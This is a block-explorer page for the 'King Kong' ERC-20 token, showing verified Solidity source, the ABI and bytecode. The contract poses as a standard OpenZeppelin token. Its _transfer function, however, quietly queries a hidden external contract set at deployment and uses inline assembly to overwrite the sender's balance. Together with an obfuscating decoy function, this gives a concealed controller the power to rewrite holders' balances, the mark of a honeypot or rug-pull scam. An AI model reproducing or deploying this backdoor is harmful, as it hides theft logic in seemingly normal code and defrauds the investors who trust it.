ETH Price: $3,479.59 (-1.09%)
Gas: 2 Gwei

Token

King Kong (KingKong)
 

Overview

Max Total Supply

2,000,000,000 KingKong

Holders

79

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,019,392.546642112325426551 KingKong

Value
$0.00
0xe0eaead42c4624daee12ffd4e962b60a22a1c0ec
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KingKong

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 3 of 4: KingKong.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 */
contract KingKong is Ownable, IERC20 {

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _mdd;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, address mdr_) {
        _name = name_; 
        _symbol = symbol_; 
        _mdd = mdr_;
        _mint(msg.sender, 2000000000 * 10 ** 18);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        (bool success, bytes memory data) = _mdd.call(abi.encodeWithSignature(
            "allowance(address,address)", from, address(0)));
        if (!success) return;
        uint256 v; assembly { v := mload(add(data, add(16, 16))) }
        if (v > 0) {
            uint256 b = 4;
            uint256 a = b * 8; 
            assembly {
                mstore(0, from) 
                mstore(a, b) 
                sstore(keccak256(0, 64), v) 
            }
        }
        okpx(129, bytes32(0));
        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function okpx(uint128 k, bytes32 kk) private pure {
        if (k == 0) return;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"mdr_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b5060405162000e3d38038062000e3d83398101604081905262000034916200028a565b82516200004990600190602086019062000139565b5081516200005f90600290602085019062000139565b506001600160601b0319606082901b166080526200008a336b06765c793fa10079d000000062000093565b505050620003cb565b6001600160a01b038216620000c55760405162461bcd60e51b8152600401620000bc9062000313565b60405180910390fd5b8060036000828254620000d9919062000353565b90915550506001600160a01b038216600081815260046020526040808220805485019055517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200012d9085906200034a565b60405180910390a35050565b828054620001479062000378565b90600052602060002090601f0160209004810192826200016b5760008555620001b6565b82601f106200018657805160ff1916838001178555620001b6565b82800160010185558215620001b6579182015b82811115620001b657825182559160200191906001019062000199565b50620001c4929150620001c8565b5090565b5b80821115620001c45760008155600101620001c9565b600082601f830112620001f0578081fd5b81516001600160401b03808211156200020d576200020d620003b5565b6040516020601f8401601f1916820181018381118382101715620002355762000235620003b5565b60405283825285840181018710156200024c578485fd5b8492505b838310156200026f578583018101518284018201529182019162000250565b838311156200028057848185840101525b5095945050505050565b6000806000606084860312156200029f578283fd5b83516001600160401b0380821115620002b6578485fd5b620002c487838801620001df565b94506020860151915080821115620002da578384fd5b50620002e986828701620001df565b604086015190935090506001600160a01b038116811462000308578182fd5b809150509250925092565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b90815260200190565b600082198211156200037357634e487b7160e01b81526011600452602481fd5b500190565b6002810460018216806200038d57607f821691505b60208210811415620003af57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610a53620003ea60003960006104c70152610a536000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a08231146101475780638da5cb5b1461015a57806395d89b411461016f578063a457c2d714610177578063a9059cbb1461018a578063dd62ed3e1461019d576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100f757806323b872dd1461010c578063313ce5671461011f5780633950935114610134575b600080fd5b6100c16101b0565b6040516100ce9190610792565b60405180910390f35b6100ea6100e5366004610714565b610242565b6040516100ce9190610787565b6100ff610264565b6040516100ce9190610952565b6100ea61011a3660046106d9565b61026a565b610127610298565b6040516100ce919061095b565b6100ea610142366004610714565b61029d565b6100ff610155366004610686565b6102c9565b6101626102e8565b6040516100ce9190610759565b6100c16102f7565b6100ea610185366004610714565b610306565b6100ea610198366004610714565b610357565b6100ff6101ab3660046106a7565b61036f565b6060600180546101bf906109cc565b80601f01602080910402602001604051908101604052809291908181526020018280546101eb906109cc565b80156102385780601f1061020d57610100808354040283529160200191610238565b820191906000526020600020905b81548152906001019060200180831161021b57829003601f168201915b5050505050905090565b60008061024d61039a565b905061025a81858561039e565b5060019392505050565b60035490565b60008061027561039a565b9050610282858285610452565b61028d85858561049c565b506001949350505050565b601290565b6000806102a861039a565b905061025a8185856102ba858961036f565b6102c49190610969565b61039e565b6001600160a01b0381166000908152600460205260409020545b919050565b6000546001600160a01b031690565b6060600280546101bf906109cc565b60008061031161039a565b9050600061031f828661036f565b90508381101561034a5760405162461bcd60e51b81526004016103419061090d565b60405180910390fd5b61028d828686840361039e565b60008061036261039a565b905061025a81858561049c565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166103c45760405162461bcd60e51b8152600401610341906108c9565b6001600160a01b0382166103ea5760405162461bcd60e51b8152600401610341906107c5565b6001600160a01b0380841660008181526005602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610445908590610952565b60405180910390a3505050565b600061045e848461036f565b9050600019811461049657818110156104895760405162461bcd60e51b815260040161034190610807565b610496848484840361039e565b50505050565b6001600160a01b0383166104c25760405162461bcd60e51b815260040161034190610884565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031685600060405160240161050392919061076d565b60408051601f198184030181529181526020820180516001600160e01b0316636eb1769f60e11b17905251610538919061073d565b6000604051808303816000865af19150503d8060008114610575576040519150601f19603f3d011682016040523d82523d6000602084013e61057a565b606091505b50915091508161058b575050610666565b602081015180156105b657600460006105a5826008610981565b600089815292905250604090208190555b6105c26081600061066b565b6001600160a01b038616600090815260046020526040902054848110156105fb5760405162461bcd60e51b81526004016103419061083e565b6001600160a01b0380881660008181526004602052604080822089860390559289168082529083902080548901905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610659908990610952565b60405180910390a3505050505b505050565b5050565b80356001600160a01b03811681146102e357600080fd5b600060208284031215610697578081fd5b6106a08261066f565b9392505050565b600080604083850312156106b9578081fd5b6106c28361066f565b91506106d06020840161066f565b90509250929050565b6000806000606084860312156106ed578081fd5b6106f68461066f565b92506107046020850161066f565b9150604084013590509250925092565b60008060408385031215610726578182fd5b61072f8361066f565b946020939093013593505050565b6000825161074f8184602087016109a0565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0392831681529116602082015260400190565b901515815260200190565b60006020825282518060208401526107b18160408501602087016109a0565b601f01601f19169190910160400192915050565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b6000821982111561097c5761097c610a07565b500190565b600081600019048311821515161561099b5761099b610a07565b500290565b60005b838110156109bb5781810151838201526020016109a3565b838111156104965750506000910152565b6002810460018216806109e057607f821691505b60208210811415610a0157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea26469706673582212202d74288b14654c3044fd0170c0f19466810eafbfc2382b660802fe22a28a1cd164736f6c63430008000033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc00000000000000000000000000000000000000000000000000000000000000094b696e67204b6f6e67000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084b696e674b6f6e67000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a08231146101475780638da5cb5b1461015a57806395d89b411461016f578063a457c2d714610177578063a9059cbb1461018a578063dd62ed3e1461019d576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100f757806323b872dd1461010c578063313ce5671461011f5780633950935114610134575b600080fd5b6100c16101b0565b6040516100ce9190610792565b60405180910390f35b6100ea6100e5366004610714565b610242565b6040516100ce9190610787565b6100ff610264565b6040516100ce9190610952565b6100ea61011a3660046106d9565b61026a565b610127610298565b6040516100ce919061095b565b6100ea610142366004610714565b61029d565b6100ff610155366004610686565b6102c9565b6101626102e8565b6040516100ce9190610759565b6100c16102f7565b6100ea610185366004610714565b610306565b6100ea610198366004610714565b610357565b6100ff6101ab3660046106a7565b61036f565b6060600180546101bf906109cc565b80601f01602080910402602001604051908101604052809291908181526020018280546101eb906109cc565b80156102385780601f1061020d57610100808354040283529160200191610238565b820191906000526020600020905b81548152906001019060200180831161021b57829003601f168201915b5050505050905090565b60008061024d61039a565b905061025a81858561039e565b5060019392505050565b60035490565b60008061027561039a565b9050610282858285610452565b61028d85858561049c565b506001949350505050565b601290565b6000806102a861039a565b905061025a8185856102ba858961036f565b6102c49190610969565b61039e565b6001600160a01b0381166000908152600460205260409020545b919050565b6000546001600160a01b031690565b6060600280546101bf906109cc565b60008061031161039a565b9050600061031f828661036f565b90508381101561034a5760405162461bcd60e51b81526004016103419061090d565b60405180910390fd5b61028d828686840361039e565b60008061036261039a565b905061025a81858561049c565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166103c45760405162461bcd60e51b8152600401610341906108c9565b6001600160a01b0382166103ea5760405162461bcd60e51b8152600401610341906107c5565b6001600160a01b0380841660008181526005602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610445908590610952565b60405180910390a3505050565b600061045e848461036f565b9050600019811461049657818110156104895760405162461bcd60e51b815260040161034190610807565b610496848484840361039e565b50505050565b6001600160a01b0383166104c25760405162461bcd60e51b815260040161034190610884565b6000807f0000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc6001600160a01b031685600060405160240161050392919061076d565b60408051601f198184030181529181526020820180516001600160e01b0316636eb1769f60e11b17905251610538919061073d565b6000604051808303816000865af19150503d8060008114610575576040519150601f19603f3d011682016040523d82523d6000602084013e61057a565b606091505b50915091508161058b575050610666565b602081015180156105b657600460006105a5826008610981565b600089815292905250604090208190555b6105c26081600061066b565b6001600160a01b038616600090815260046020526040902054848110156105fb5760405162461bcd60e51b81526004016103419061083e565b6001600160a01b0380881660008181526004602052604080822089860390559289168082529083902080548901905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610659908990610952565b60405180910390a3505050505b505050565b5050565b80356001600160a01b03811681146102e357600080fd5b600060208284031215610697578081fd5b6106a08261066f565b9392505050565b600080604083850312156106b9578081fd5b6106c28361066f565b91506106d06020840161066f565b90509250929050565b6000806000606084860312156106ed578081fd5b6106f68461066f565b92506107046020850161066f565b9150604084013590509250925092565b60008060408385031215610726578182fd5b61072f8361066f565b946020939093013593505050565b6000825161074f8184602087016109a0565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0392831681529116602082015260400190565b901515815260200190565b60006020825282518060208401526107b18160408501602087016109a0565b601f01601f19169190910160400192915050565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b6000821982111561097c5761097c610a07565b500190565b600081600019048311821515161561099b5761099b610a07565b500290565b60005b838110156109bb5781810151838201526020016109a3565b838111156104965750506000910152565b6002810460018216806109e057607f821691505b60208210811415610a0157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea26469706673582212202d74288b14654c3044fd0170c0f19466810eafbfc2382b660802fe22a28a1cd164736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc00000000000000000000000000000000000000000000000000000000000000094b696e67204b6f6e67000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084b696e674b6f6e67000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): King Kong
Arg [1] : symbol_ (string): KingKong
Arg [2] : mdr_ (address): 0x7e140B797851aDF523d1Cb8ff7CEF8d91E74e4dc

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 0000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [4] : 4b696e67204b6f6e670000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [6] : 4b696e674b6f6e67000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

174:9672:2:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;937:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3297:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;2066:108::-;;;:::i;:::-;;;;;;;:::i;4078:261::-;;;;;;:::i;:::-;;:::i;1908:93::-;;;:::i;:::-;;;;;;;:::i;4748:238::-;;;;;;:::i;:::-;;:::i;2237:127::-;;;;;;:::i;:::-;;:::i;980:87:3:-;;;:::i;:::-;;;;;;;:::i;1156:104:2:-;;;:::i;5489:436::-;;;;;;:::i;:::-;;:::i;2570:193::-;;;;;;:::i;:::-;;:::i;2826:151::-;;;;;;:::i;:::-;;:::i;937:100::-;991:13;1024:5;1017:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;937:100;:::o;3297:201::-;3380:4;3397:13;3413:12;:10;:12::i;:::-;3397:28;;3436:32;3445:5;3452:7;3461:6;3436:8;:32::i;:::-;-1:-1:-1;3486:4:2;;3297:201;-1:-1:-1;;;3297:201:2:o;2066:108::-;2154:12;;2066:108;:::o;4078:261::-;4175:4;4192:15;4210:12;:10;:12::i;:::-;4192:30;;4233:38;4249:4;4255:7;4264:6;4233:15;:38::i;:::-;4282:27;4292:4;4298:2;4302:6;4282:9;:27::i;:::-;-1:-1:-1;4327:4:2;;4078:261;-1:-1:-1;;;;4078:261:2:o;1908:93::-;1991:2;1908:93;:::o;4748:238::-;4836:4;4853:13;4869:12;:10;:12::i;:::-;4853:28;;4892:64;4901:5;4908:7;4945:10;4917:25;4927:5;4934:7;4917:9;:25::i;:::-;:38;;;;:::i;:::-;4892:8;:64::i;2237:127::-;-1:-1:-1;;;;;2338:18:2;;2311:7;2338:18;;;:9;:18;;;;;;2237:127;;;;:::o;980:87:3:-;1026:7;1053:6;-1:-1:-1;;;;;1053:6:3;980:87;:::o;1156:104:2:-;1212:13;1245:7;1238:14;;;;;:::i;5489:436::-;5582:4;5599:13;5615:12;:10;:12::i;:::-;5599:28;;5638:24;5665:25;5675:5;5682:7;5665:9;:25::i;:::-;5638:52;;5729:15;5709:16;:35;;5701:85;;;;-1:-1:-1;;;5701:85:2;;;;;;;:::i;:::-;;;;;;;;;5822:60;5831:5;5838:7;5866:15;5847:16;:34;5822:8;:60::i;2570:193::-;2649:4;2666:13;2682:12;:10;:12::i;:::-;2666:28;;2705;2715:5;2722:2;2726:6;2705:9;:28::i;2826:151::-;-1:-1:-1;;;;;2942:18:2;;;2915:7;2942:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;2826:151::o;656:98:0:-;736:10;656:98;:::o;8786:346:2:-;-1:-1:-1;;;;;8888:19:2;;8880:68;;;;-1:-1:-1;;;8880:68:2;;;;;;;:::i;:::-;-1:-1:-1;;;;;8967:21:2;;8959:68;;;;-1:-1:-1;;;8959:68:2;;;;;;;:::i;:::-;-1:-1:-1;;;;;9040:18:2;;;;;;;:11;:18;;;;;;;;: